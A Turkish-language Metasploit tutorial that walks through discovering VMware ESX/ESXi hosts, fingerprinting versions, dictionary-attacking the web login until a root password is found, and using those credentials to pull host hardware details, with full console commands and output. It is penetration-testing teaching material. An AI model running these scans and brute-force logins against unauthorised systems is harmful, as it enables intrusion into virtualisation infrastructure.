Vmware Sanallaştırma Sistemlerine Yönelik Keşif ve Bilgi Toplama Teknikleri

Metsploit Framework aracında bulunan VMware Auxiliary modülleri ile, yerel ağdaki vmware sistemlerini, vmware kullanıcı ve gruplarını tespit edebilir ve yetkileri hakkında bilgi toplayabilirsiniz. Vmhost ESX/ESXI üzerinde mi çalışıyor, versiyon bilgilerini alabilirsiniz.

 

VMWare ile ilgili tüm yardımcı araçları bulmak için aşağıdaki arama komutunu kullanabilirsiniz;

msf > search type:auxiliary vmware

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/admin/vmware/poweroff_vm normal VMWare Power Off Virtual Machine
auxiliary/admin/vmware/poweron_vm normal VMWare Power On Virtual Machine
auxiliary/admin/vmware/tag_vm normal VMWare Tag Virtual Machine
auxiliary/admin/vmware/terminate_esx_sessions normal VMWare Terminate ESX Login Sessions
auxiliary/scanner/http/vmware_server_dir_trav normal VMware Server Directory Transversal Vulnerability
auxiliary/scanner/vmware/esx_fingerprint normal VMWare ESX/ESXi Fingerprint Scanner
auxiliary/scanner/vmware/vmauthd_login normal VMWare Authentication Daemon Login Scanner
auxiliary/scanner/vmware/vmauthd_version normal VMWare Authentication Daemon Version Scanner
auxiliary/scanner/vmware/vmware_enum_permissions normal VMWare Enumerate Permissions
auxiliary/scanner/vmware/vmware_enum_sessions normal VMWare Enumerate Active Sessions
auxiliary/scanner/vmware/vmware_enum_users normal VMWare Enumerate User Accounts
auxiliary/scanner/vmware/vmware_enum_vms normal VMWare Enumerate Virtual Machines
auxiliary/scanner/vmware/vmware_host_details normal VMWare Enumerate Host Details
auxiliary/scanner/vmware/vmware_http_login normal VMWare Web Login Scanner
auxiliary/scanner/vmware/vmware_screenshot_stealer normal VMWare Screenshot Stealer

Herhangi bir modül hakkında detaylı bilgiye, info komutu ile ulaşabilirsiniz,
msf > info auxiliary/scanner/vmware/esx_fingerprint

Name: VMWare ESX/ESXi Fingerprint Scanner
Module: auxiliary/scanner/vmware/esx_fingerprint
Version: $Revision$
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
TheLightCosine <thelightcosine@metasploit.com>

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 443 yes The target port
THREADS 1 yes The number of concurrent threads
URI /sdk no The uri path to test against
VHOST no HTTP server virtual host

Description:
This module accesses the web API interfaces for VMware ESX/ESXi
servers and attempts to identify version information for that
server.

Uygulamalar,

Networkde bulunan vmware sistemleri ve versiyonlarını tespit etmek (esx_fingerprint)

msf > use auxiliary/scanner/vmware/esx_fingerprint
msf auxiliary(esx_fingerprint) > show options

Module options (auxiliary/scanner/vmware/esx_fingerprint):

Name Current Setting Required Description
—- ————— ——– ———–
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 443 yes The target port
THREADS 1 yes The number of concurrent threads
URI /sdk no The uri path to test against
VHOST no HTTP server virtual host

msf auxiliary(esx_fingerprint) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(esx_fingerprint) > run

[+] Identified VMware ESXi 4.1.0 build-260247
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Not: RHOSTS değeri; ip adresi (1.1.1.1), subnet (1.1.1.0/8) veya dosyadan okunacak şekilde (file:/tmp/ip.lst) set edilebilir.

Sanallaştırmanın VMware ESXi 4.1.0 versiyona sahip olduğu tespit edildi.

VMWare Authentication Daemon Version Scanner (vmauthd_version)
Bu modül, TCP 902 portundan bağlantı kurarak hedefin kimlik doğrulama servisi hakkında bilgi verir.

msf > use auxiliary/scanner/vmware/vmauthd_version
msf auxiliary(vmauthd_version) > info

Name: VMWare Authentication Daemon Version Scanner
Module: auxiliary/scanner/vmware/vmauthd_version
Version: $Revision$
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
TheLightCosine <thelightcosine@metasploit.com>
hdm <hdm@metasploit.com>

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target address range or CIDR identifier
RPORT 902 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module will identify information about a host through the
vmauthd service.

msf auxiliary(vmauthd_version) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(vmauthd_version) > run

[*] 1.1.1.1:902 Switching to SSL connection…
[*] 1.1.1.1:902 Banner: 220 VMware Authentication Daemon Version 1.10: SSL Required, ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC , VMXARGS supported Certificate:/C=US/ST=California/L=Palo Alto/O=VMware, Inc/OU=VMware ESX Server Default Certificate/emailAddress=ssl-certificates@vmware.com/CN=localhost.localdomain/unstructuredName=1295122519,564d7761726520496e632e
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

VMWare Web Login Taraması (vmware_http_login)
Bu modül vmware kimlik doğrulama servisine parola denemesi gerçekleştirir, bu işlem için bir sözlük dosyası kullanabilirsiniz.

msf > use auxiliary/scanner/vmware/vmware_http_login
msf auxiliary(vmware_http_login) > set PASS_FILE /root/pass.lst
PASS_FILE => /root/pass.lst
msf auxiliary(vmware_http_login) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(vmware_http_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(vmware_http_login) > run

[+] 1.1.1.1:443 – Identified VMware ESXi 4.1.0 build-260247
[-] 1.1.1.1:443 – Login Failure (root:)
[-] 1.1.1.1:443 – Login Failure (root:root)
[-] 1.1.1.1:443 – Login Failure (root:admin)
[-] 1.1.1.1:443 – Login Failure (root:password)
[-] 1.1.1.1:443 – Login Failure (root:123456)
[-] 1.1.1.1:443 – Login Failure (root:P@ssw0rd)
[+] 1.1.1.1:443 – Successful Login! (root:BenimGizliParolam)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

VMWare Host Hakkında Detaylı Bilgi Alma (vmware_host_details)

Bağlantı bilgileri elde ettikden sonra, VMWare sisteminden bu yardımcı araç ile detaylı bilgi alınabilir.

msf > use auxiliary/scanner/vmware/vmware_host_details
msf auxiliary(vmware_host_details) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(vmware_host_details) > set PASSWORD BenimGizliParolam
PASSWORD => BenimGizliParolam
msf auxiliary(vmware_host_details) > set HW_DETAILS true
HW_DETAILS => true
msf auxiliary(vmware_host_details) > run

[+] VMWare Host at 1.1.1.1 details
—————————–

– ha-host:
hardware:
vendor: System manufacturer
model: System Product Name
uuid: 8065001e-8c00-00df-2315-bcaec504ad78
otherIdentifyingInfo:
identifierValue: ! ‘ Asset-1234567890’
identifierType:
label: AssetTag
summary: AssetTag
key: AssetTag
memorySize: ‘16909213696’
cpuModel: AMD Phenom(tm) II X4 965 Processor
cpuMhz: ‘3411’
numCpuPkgs: ‘1’
numCpuCores: ‘4’
numCpuThreads: ‘4’
numNics: ‘1’
numHBAs: ‘8’
runtime:
connectionState: connected
powerState: poweredOn
inMaintenanceMode: ‘false’
bootTime: ‘2012-01-30T17:08:58.847297Z’
config:
name: localhost.
port: ‘902’
product:

Yazar:

Ozan UÇAR
ozan.ucar@bga.com.tr